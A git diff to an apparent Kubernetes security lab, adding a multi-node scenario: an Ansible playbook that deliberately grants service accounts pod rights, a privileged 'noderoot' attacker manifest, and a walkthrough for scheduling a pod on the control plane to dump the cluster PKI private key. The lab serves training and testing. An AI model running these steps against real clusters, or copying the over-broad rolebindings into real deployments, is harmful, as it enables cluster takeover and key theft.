diff --git a/Scenario Setups/ssh-to-create-pod-easy.md b/Scenario Setups/ssh-to-create-pod-easy.md index 85a97f0..abe7af5 100644 --- a/Scenario Setups/ssh-to-create-pod-easy.md +++ b/Scenario Setups/ssh-to-create-pod-easy.md @@ -2,7 +2,7 @@ This cluster has an exposed SSH service running on port 32001/TCP to a pod in the cluster with rights to manage pods in the default namespace. To test this run -- `ansible-playbook ssh-to-create-pods-easy.yml` +- `ansible-playbook ssh-to-create-pod-easy.yml` Then get a note of the IP address of the Kubernetes cluster with diff --git a/Scenario Setups/ssh-to-create-pod-multi-node.md b/Scenario Setups/ssh-to-create-pod-multi-node.md new file mode 100644 index 0000000..b1cc20c --- /dev/null +++ b/Scenario Setups/ssh-to-create-pod-multi-node.md @@ -0,0 +1,25 @@ +## SSH to Create Pod - Multi-Node + +This cluster has an exposed SSH service running on port 32001/TCP to a pod in the cluster with rights to manage pods in the default namespace. To test this run + +- `ansible-playbook ssh-to-create-pods-multi-node.yml` + +Then get a note of the IP address of the worker node in the cluster by running + +``` +docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' sshcpmn-worker +``` + +Connect to your client container + +``` +docker exec -it client /bin/bash +``` + +and from there + +``` +ssh -p 32001 sshuser@[worker node ip] +``` + +The password for the sshuser account is `sshuser` \ No newline at end of file diff --git a/Scenario Walkthroughs/ssh-to-create-pod-multi-node.md b/Scenario Walkthroughs/ssh-to-create-pod-multi-node.md new file mode 100644 index 0000000..0e88982 --- /dev/null +++ b/Scenario Walkthroughs/ssh-to-create-pod-multi-node.md @@ -0,0 +1,24 @@ +## SSH to Create Pod - Multi-Node + +## Compromising the cluster + +3. `kubectl get po -n kube-system` will fail (user doesn't have those rights) +4. `kubectl get po` will work and give you a list of pods in the default namespace +At this point there are several ways to achieve the goal; let's go with hostpath, however as we have a multi-node cluster, we need to make sure that our pod will land on the control plane node that has the key available. + +5. There are two steps needed to modify the keydumper manifest to have this work. First, copy the `/key-dumper-pod.yml` file to `/home/sshuser/`, then add the following lines to the spec section of the manifest to allow it to schedule to a control plane node: +```yaml + tolerations: + - key: node-role.kubernetes.io/master + effect: NoSchedule +``` + +6. Then we need to specify the node to land on, get the nodes with `kubectl get nodes` then add the following line to the spec section of the manifest. +```yaml + nodeName: sshcpmn-control-plane +``` + + +7. Now we need to create a pod that dumps out the PKI private key `kubectl create -f key-dumper-pod.yml` +8. and the key should be in the logs `kubectl logs keydumper-pod` +9. profit!
diff --git a/attacker_manifests/noderoot.yml b/attacker_manifests/noderoot.yml index af0d381..807c988 100644 --- a/attacker_manifests/noderoot.yml +++ b/attacker_manifests/noderoot.yml @@ -7,6 +7,9 @@ metadata: name: noderootpod labels: spec: + tolerations: + - key: node-role.kubernetes.io/master + effect: NoSchedule hostNetwork: true hostPID: true hostIPC: true diff --git a/kubeadm_configs/multi-node-cluster.yml b/kubeadm_configs/multi-node-cluster.yml new file mode 100644 index 0000000..d12c20d --- /dev/null +++ b/kubeadm_configs/multi-node-cluster.yml @@ -0,0 +1,6 @@ +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 + +nodes: +- role: control-plane +- role: worker diff --git a/ssh-to-create-pods-multi-node.yml b/ssh-to-create-pods-multi-node.yml new file mode 100644 index 0000000..d55d0d9 --- /dev/null +++ b/ssh-to-create-pods-multi-node.yml @@ -0,0 +1,43 @@ +#!/usr/bin/env ansible-playbook +--- +- name: Start up a kind cluster + hosts: localhost + vars: + cluster_name: sshcpmn + # This needs to be the cluster name with -control-plane added + container_name: sshcpmn-control-plane + cluster_config: multi-node-cluster.yml + kubernetes_version: v1.18.2 + + tasks: + - import_tasks: ./ansible_tasks/setup_kind_custom_config.yaml + + +- name: Setup Cluster + hosts: sshcpmn-control-plane + connection: docker + vars: + ansible_python_interpreter: /usr/bin/python3 + + tasks: + - import_tasks: ./ansible_tasks/setup_kubeconfig.yml + - import_tasks: ./ansible_tasks/setup_ssh_pod.yml + + - name: Copy Role Manifest + copy: + src: ./manifests/pod-manager.yml + dest: /root + + - name: Apply Role Manifest + command: kubectl create -f /root/pod-manager.yml + + - name: Give the default service account rights to manage pods + command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts + + - name: Create a clusterrole for reading nodes + command: kubectl create clusterrole node-reader --verb=get,list --resource=nodes + + - name: Give the default service account rights to get nodes + command: kubectl create clusterrolebinding serviceaccounts-read-nodes --clusterrole=node-reader --group=system:serviceaccounts + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file